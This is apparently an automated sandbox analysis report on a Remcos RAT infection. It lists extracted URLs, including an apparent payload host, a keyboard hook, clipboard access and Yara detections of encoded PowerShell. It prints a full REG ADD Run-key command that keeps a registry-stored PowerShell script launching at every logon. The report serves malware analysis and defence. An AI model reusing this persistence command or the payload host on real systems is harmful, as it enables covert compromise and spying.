                Source: powershell.exe, 00000004.00000002.1983290797.0000000005F27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000004.00000002.1983290797.0000000005F27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: bhvF678.tmp.13.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
                Source: bhvF678.tmp.13.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: bhvF678.tmp.13.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
                Source: bhvF678.tmp.13.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
                Source: bhvF678.tmp.13.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
                Source: bhvF678.tmp.13.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?99bdaa7641aea1439604d0afe8971477
                Source: bhvF678.tmp.13.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?bc7d158a1b0c0bcddb88a222b6122bda
                Source: bhvF678.tmp.13.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
                Source: bhvF678.tmp.13.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
                Source: bhvF678.tmp.13.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?4be9f57fdbd89d63c136fa90032d1d91
                Source: bhvF678.tmp.13.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?e5772e13592c9d33c9159aed24f891a7
                Source: bhvF678.tmp.13.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?a6aceac28fb5ae421a73cab7cdd76bd8
                Source: bhvF678.tmp.13.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?b57fe5cd49060a950d25a1d237496815
                Source: bhvF678.tmp.13.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?2f6c563d6db8702d4f61cfc28e14d6ba
                Source: bhvF678.tmp.13.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?3dacce210479f0b4d47ed33c21160712
                Source: bhvF678.tmp.13.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?7e0e9c3a9f02f17275e789accf11532b
                Source: bhvF678.tmp.13.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?81f59f7d566abbd2077a5b6cdfd04c7b
                Source: bhvF678.tmp.13.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?3c5bdbf226e2549812723f51b8fe2023
                Source: bhvF678.tmp.13.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?c50299ad5b45bb3d4c7a57024998a291
                Source: bhvF678.tmp.13.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
                Source: powershell.exe, 00000004.00000002.1967209792.0000000005018000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1996067162.0000000007B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000002.00000002.1787742509.0000012080BBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: bhvF678.tmp.13.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: msiexec.exe, 0000000D.00000003.2249145713.0000000004990000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2248999845.0000000004990000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2249304549.0000000004990000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2250137842.0000000004990000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2248870650.0000000004990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=
                Source: bhvF678.tmp.13.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: bhvF678.tmp.13.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: bhvF678.tmp.13.drString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
                Source: bhvF678.tmp.13.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
                Source: msiexec.exeString found in binary or memory: https://login.yahoo.com/config/login
                Source: bhvF678.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                Source: bhvF678.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2.css
                Source: bhvF678.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qo
                Source: bhvF678.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                Source: bhvF678.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2.js
                Source: bhvF678.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                Source: bhvF678.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                Source: bhvF678.tmp.13.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
                Source: powershell.exe, 00000002.00000002.1808977051.000001209006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1983290797.0000000005F27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: bhvF678.tmp.13.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
                Source: bhvF678.tmp.13.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=27ff908e89d7b6264fde
                Source: bhvF678.tmp.13.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=586ba6
                Source: bhvF678.tmp.13.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=7ccb04
                Source: bhvF678.tmp.13.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=b1ed69
                Source: bhvF678.tmp.13.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
                Source: bhvF678.tmp.13.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
                Source: bhvF678.tmp.13.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
                Source: bhvF678.tmp.13.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
                Source: powershell.exe, 00000002.00000002.1787742509.000001208022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1787742509.000001208164A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top
                Source: powershell.exe, 00000002.00000002.1787742509.000001208022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/Underbyggelse.aafP
                Source: powershell.exe, 00000004.00000002.1967209792.0000000005018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/Underbyggelse.aafXR$lX
                Source: bhvF678.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                Source: bhvF678.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                Source: bhvF678.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                Source: bhvF678.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                Source: bhvF678.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                Source: bhvF678.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
                Source: bhvF678.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                Source: bhvF678.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
                Source: bhvF678.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                Source: bhvF678.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
                Source: bhvF678.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
                Source: bhvF678.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
                Source: bhvF678.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
                Source: bhvF678.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
                Source: bhvF678.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                Source: bhvF678.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                Source: bhvF678.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                Source: bhvF678.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                Source: bhvF678.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                Source: bhvF678.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                Source: bhvF678.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                Source: bhvF678.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                Source: bhvF678.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                Source: bhvF678.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                Source: bhvF678.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                Source: bhvF678.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                Source: bhvF678.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                Source: bhvF678.tmp.13.drString found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
                Source: bhvF678.tmp.13.drString found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
                Source: bhvF678.tmp.13.drString found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
                Source: bhvF678.tmp.13.drString found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
                Source: bhvF678.tmp.13.drString found in binary or memory: https://www.digicert.com/CPS0
                Source: msiexec.exe, msiexec.exe, 0000000F.00000002.2225859167.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: msiexec.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: bhvF678.tmp.13.drString found in binary or memory: https://www.office.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownHTTPS traffic detected: 172.67.155.139:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.155.139:443 -> 192.168.2.4:49737 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Installs a global keyboard hook
                Source: C:\Windows\SysWOW64\msiexec.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\msiexec.exeJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0041183A OpenClipboard,GetLastError,13_2_0041183A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_0040987A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_004098E2
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_00406DFC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,14_2_00406E9F
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_004068B5
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,15_2_004072B5

                E-Banking Fraud

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7104, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: amsi32_3272.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 6852, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 3272, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00401806 NtdllDefWindowProc_W,13_2_00401806
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004018C0 NtdllDefWindowProc_W,13_2_004018C0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004016FD NtdllDefWindowProc_A,14_2_004016FD
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004017B7 NtdllDefWindowProc_A,14_2_004017B7
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00402CAC NtdllDefWindowProc_A,15_2_00402CAC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00402D66 NtdllDefWindowProc_A,15_2_00402D66
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B8ABEA22_2_00007FFD9B8ABEA2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B8AB0F62_2_00007FFD9B8AB0F6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B97AB4A2_2_00007FFD9B97AB4A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04EAEDF04_2_04EAEDF0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04EAF6C04_2_04EAF6C0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04EAEAA84_2_04EAEAA8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044B04013_2_0044B040
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0043610D13_2_0043610D
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044731013_2_00447310
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044A49013_2_0044A490
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040755A13_2_0040755A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0043C56013_2_0043C560
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044B61013_2_0044B610
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044D6C013_2_0044D6C0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004476F013_2_004476F0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044B87013_2_0044B870
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044081D13_2_0044081D
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0041495713_2_00414957
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004079EE13_2_004079EE
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00407AEB13_2_00407AEB
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044AA8013_2_0044AA80
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00412AA913_2_00412AA9
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00404B7413_2_00404B74
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00404B0313_2_00404B03
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044BBD813_2_0044BBD8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00404BE513_2_00404BE5
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00404C7613_2_00404C76
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00415CFE13_2_00415CFE
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00416D7213_2_00416D72
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00446D3013_2_00446D30
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00446D8B13_2_00446D8B
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00406E8F13_2_00406E8F
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040503814_2_00405038
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0041208C14_2_0041208C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004050A914_2_004050A9
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040511A14_2_0040511A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0043C13A14_2_0043C13A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004051AB14_2_004051AB
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044930014_2_00449300
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040D32214_2_0040D322
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044A4F014_2_0044A4F0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0043A5AB14_2_0043A5AB
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0041363114_2_00413631
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044669014_2_00446690
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044A73014_2_0044A730
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004398D814_2_004398D8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004498E014_2_004498E0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044A88614_2_0044A886
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0043DA0914_2_0043DA09
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00438D5E14_2_00438D5E
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00449ED014_2_00449ED0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0041FE8314_2_0041FE83
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00430F5414_2_00430F54
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004050C215_2_004050C2
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004014AB15_2_004014AB
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0040513315_2_00405133
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004051A415_2_004051A4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0040124615_2_00401246
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0040CA4615_2_0040CA46
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0040523515_2_00405235
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004032C815_2_004032C8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0040168915_2_00401689
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00402F6015_2_00402F60
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004169A7 appears 87 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0044DB70 appears 41 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004165FF appears 35 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00422297 appears 42 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00444B5A appears 37 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00413025 appears 79 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00416760 appears 69 times
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)"
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6127
                Source: unknownProcess created: Commandline size = 6151
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6127Jump to behavior
                Source: amsi32_3272.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 6852, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 3272, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal100.troj.spyw.evad.winCMD@22/14@8/3
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,13_2_004182CE
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,15_2_00410DE1
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,13_2_00418758
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,13_2_00413D4C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource,13_2_004148B6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Rafting.AnsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4464:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6732:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7092:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6880:120:WilError_03
                Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-TXCR8B
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vd4vqodm.w5c.ps1Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs"
                Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: HandleInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6852
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3272
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: msiexec.exe, msiexec.exe, 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: msiexec.exe, 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
